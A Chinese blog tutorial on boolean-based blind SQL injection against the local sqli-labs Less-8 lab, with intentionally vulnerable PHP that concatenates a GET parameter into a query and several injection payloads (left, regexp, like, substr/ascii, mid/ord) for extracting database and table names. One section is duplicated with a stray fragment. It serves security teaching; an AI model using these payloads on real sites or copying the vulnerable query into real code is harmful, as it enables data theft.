5.布尔盲注

最新推荐文章于 2024-03-27 21:46:52 发布
最新推荐文章于 2024-03-27 21:46:52 发布
阅读量602 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21237971/article/details/108235954
版权

注入我们已经有了简单的概念,然而,就是在sql注入过程中,某些sql语句的执行结果被程序限制不回显到前端,这时候我们只能用一些别的方法进行判断或者尝试,这个判断或尝试过程就叫盲注。

什么是布尔盲注

布尔是判断真假,那么布尔盲注就是通过判断真假的方式来判断或尝试的注入攻击

<?php
error_reporting(E_ALL&~E_WARNING);	//设置错误等级至WARNING不报错
include("../sql-connections/sql-connect.php");	//引入sqlilabs配置文件连接数据库
$id = $_GET['id'];
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
	echo "Right";
}
else{
	echo "Wrong";
}

来看一个简单的例子,这代码简单来说就是如果执行成功打印Right,失败了打印Wrong。他不会再去打印过多的错误信息,这个时候我们就需要通过构造语句,来判断数据库信息的正确性,再通过页面返回的真假来识别我们判断的是否正确

布尔盲注的方法

构造逻辑判断语句,判断信息真假,取出所有的真值,实现SQL注入

判断注入点

首先判断注入点,盲注是没有直接的回显的,我们需要判断页面是否能够正常显示来确定注入点

http://127.0.0.1/Less-8/?id=1

页面正常显示

image-20200729111014915

http://127.0.0.1/Less-8/?id=1'
http://127.0.0.1/Less-8/?id=1' and '1' ='2

页面不显示

image-20200729111045570

http://127.0.0.1/Less-8/?id=1' and '1' ='1

页面再次正常显示

image-20200729111014915

说明这里就是注入点

常用方法

left0函数

left(database(),1)>'s'

database()显示数据库名称,left(a,b)从左侧截取a的前b位

http://127.0.0.1/Less-8/?id=1' and left((select database()),1)='s'-- #

我们使用第八关来测试

image-20200725143012557

当前库名字的第一位如果为s则显示,不是s则不返回

我们导入burp进行爆破测试,爆破点还是测试数据s

image-20200725161625813

然后直接进行爆破,查看返回长度,发现数值为s的时候,与其他的不相符合,然后再次进行爆破

修改代码为

http://127.0.0.1/Less-8/?id=1' and left((select database()),2)='sa'-- #

将sa的a作为爆破点,直到爆出完整名称

regexp

select user() regexp '^r'

正则表达式的用法,user()结果为root,regexp为匹配root的正则表达式

mysql正则表达式:https://www.runoob.com/mysql/mysql-regexp.html

^表示匹配输入字符串的开始位置,即从输入开始判断字符串

http://127.0.0.1/Less-8/?id=1' and (select database()) regexp '^se'-- #

意思是前两位是se开头(也可以s开头),如果是则返回You are in…,不是则不返回

image-20200730161027178

在里面可直接增加字符

对数据表进行布尔盲注爆破

http://127.0.0.1/Less-8/?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 0,1) regexp '^se'-- #

image-20200730161854574

like

select user() like 'ro%'

与regexp类似,使用like进行匹配

http://127.0.0.1/Less-8/?id=1' and (select table_name from information_schema.tables where table_schema=database() limit 0,1) like 'e%'-- #

以e开头,如果是则返回You are in…,不是则不返回

subst()函数和ascii()函数

ascii(substr((select database()),1,1))=98

substr(a,b,c)从b位置开始,截取字符串a的c长度。ascii()将某个字符转换为ascii值,使用ascii值可以绕过一些不能使用单引号的场景

字符串截取后比较ascii

http://127.0.0.1/Less-8/?id=1' and ascii(substr((select database()),1,1))=115-- #

s的ascii码是115,所以这里能够正常返回

image-20200730172224632

ord()函数和mid()函数

ord(mid((select user()),1,1))=114

mid(a,b,c)从位置b开始,截取a字符串的c位ord()函数同ascii(),将字符串转为ascii值,由于使用方式同subst()函数和ascii()函数,就不再演示了

1598410879419)]

ord()函数和mid()函数

ord(mid((select user()),1,1))=114

mid(a,b,c)从位置b开始,截取a字符串的c位ord()函数同ascii(),将字符串转为ascii值,由于使用方式同subst()函数和ascii()函数,就不再演示了

kinghtxg
关注
专栏目录
《网络安全自学教程》- SQL注入之布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 1万+
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
oracle 布尔盲注,Oracle基于布尔盲注总结
weixin_32842805的博客
04-03 1099
0x01 decode函数布尔盲注decode(字段或字段的运算,值1,值2,值3)这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多使用方法:比较大小select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值sign()函数根据某个值是...
布尔盲注(一)
qq_39416206的博客
03-08 2718
什么是盲注布尔盲注的种类和介绍: 常用函数: length() 函数 返回字符串的长度 ?id=1 and length(database())>1 substr() 截取字符串 , 从第一位截取一个 ?id=1 and substr(database(),1,1)='k' ord()/ascii() 返回字符的ascii码 ?id=1 and ord(substr(database(),1,1))=107 sleep() 将程序挂起一段时间n为n秒 if(expr1,expr2
布尔盲注
m0_52880296的博客
05-06 4128
一.布尔盲注原理: 布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false, 构造SQL语句, 利用and,or等关键字来其后的语句 true 、 false使web页面返回true或者false, 从而达到注入的目的来获取信息的一种方法 没有错误提示 也没有回显 但是输入错误的话页面会有反应 也就是说 只有 true 和false 例如 :sql-labs /less-7 它只有两种提示 所以可以用布尔盲注 playload:and length(databas
布尔盲注python脚本.zip
12-28
布尔盲注(Boolean-Based Blind Injection)是一种常见的SQL注入攻击方式,它主要针对那些不返回完整查询结果或不显示任何错误信息的Web应用程序。在这种类型的注入中,攻击者通过观察服务器响应时间或状态来判断SQL...
布尔盲注.py_sql盲注python_
10-03
在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,它显然是用于演示或执行SQL盲注的工具。 在SQL盲注中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
SQL注入之基于布尔盲注详解
09-10
在基于布尔盲注中,攻击者通常会尝试构造一系列的SQL查询,这些查询会在满足特定条件时改变原本的查询结果,从而导致网页返回不同的状态。例如,通过在URL中添加`id=2' and length(database())>1 %23`这样的参数,...
基于布尔盲注
Z_l123的博客
02-18 789
关于布尔盲注 某些场合下,页面返回的结果只有两种(正常或错误)。通过构造SQL判断语 句,查看页面的返回结果(True or False)来判断哪些sQL判断条件成立,通过此来获取数据库中的数据。 一些功能函数的说明 length(str):返回字符串(str)的长度,以字节为单位。 substr(str,pos,len):从指定的位置( pos)开始,截取并返回字符串 ( str)指定长度(len)的子串。 ascii(str):返回字符串( str)最左边字符的ASCll码。 1.访问SQLi-
布尔盲注(ctfhub)
最新发布
2401_82985722的博客
03-27 1419
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
布尔盲注详解
热门推荐
AaronLuo
08-27 1万+
布尔盲注 布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false,构造SQL语句,利用and,or等关键字来其后的语句 true 、 false使web页面返回true或者false,从而达到注入的目的来获取信息 ascii() 函数,返回字符ascii码值 参数 : str单字符 length() 函数,返回字符串的长度 参数 : str 字...
有趣的布尔盲注
young9222的博客
05-16 312
2019年4月9日17:17:49 URL: http://123.206.87.240:8007/web2/ 一,试探 主页只有一个登陆框,和几个没有链接的导航。打眼看起来像是sql注入题目。 随手测试一下,用户名,密码不能为空,而且用户名不正确会弹窗: 所以是需要用户名的,测试一下admin,果然有区别: 所以猜测考点是要靠sqli获得admin的密码。 二,深入 既然猜到考点是sqli...
【Less-8】盲注布尔盲注
ssrf
10-29 1655
目录一、知识铺垫1、substr字符串截取函数2、sql中limit使用3、python中的string模块二、布尔盲注复现1、测试注入点2、判断数据库名长度3、猜数据库名4、判断表名长度5、猜表名6、判断字段名长度7、猜字段名8、判断数据长度9、猜数据 一、知识铺垫 SQL操作函数: 1、substr字符串截取函数 语法: substr(string,start,length) 例如: select substr(‘abcdefg’,3,4) from dual;【结果是cdef】 select .
布尔盲注演示
oxygensss的博客
12-12 1143
盲注:(简单但繁琐) 所谓盲注就是在服务器没有错误回显的时候完成注入攻击,没有错误回显,对于攻击者来说就少了非常重要的调试信息 大致分为两种: 1.布尔盲注 只能返回对和错,没有了之前的报错信息 and databse() = ' ' //不断用字母进行填充 => 但是组合太多,所以要切割 substr()截取字符串 substr(str,pos,len) 1.截取的东西 2.位置 3.长度 select substr('abcdefg',1,1) 返回的内容位a and substr(
布尔盲注(结合BurpSuite暴力破解)
weixin_59047731的博客
11-17 913
有些情况下,**开发人员屏蔽了报错信息**,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注盲注根据展现方式,分为**boolean型盲注和时间型盲注**。 Boolean是基于真假的判断(true or false); 不管输入什么,结果都只返回真或假两种情况; 通过and 1=1和and 1=2可以发现注入点。 Boolean型盲注的关键在于通过表达式结果与已知值进行比对,根据比对结果 判断正确与否。
sqlmap布尔盲注
08-10
布尔盲注是一种利用布尔逻辑运算进行SQL注入的技术。在布尔盲注中,攻击者通过构造特定的SQL语句,通过判断某个条件的真假来获取数据库中的信息。 SQLMap是一款常用的自动化SQL注入工具,可以帮助安全测试人员快速发现和利用SQL注入漏洞。在使用SQLMap进行布尔盲注时,你需要提供目标URL、参数名、注入点等信息。SQLMap将自动发送不同的SQL语句,根据程序返回的结果来判断条件是否成立,并进一步推测数据库中的信息。 下面是使用SQLMap进行布尔盲注的一般步骤: 1. 执行基本扫描:通过指定目标URL和参数名,执行基本的SQL注入扫描,以确定是否存在注入漏洞。 2. 确定注入点:如果基本扫描成功,SQLMap将会尝试确定具体的注入位置。 3. 进行布尔盲注:在确认注入点后,SQLMap将自动生成相应的布尔盲注语句,并发送给目标服务器。通过观察服务器返回的页面内容或响应码,SQLMap将根据条件的真假来判断数据库中的信息。 4. 获取数据库信息:如果布尔盲注成功,SQLMap可以继续获取数据库的表名、列名、数据等敏感信息。 需要注意的是,使用SQL注入工具进行测试时,请确保已经得到合法授权,并遵守法律和道德规范。此外,使用自动化工具可能会对目标服务器造成不必要的负载,所以在使用时应谨慎操作。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值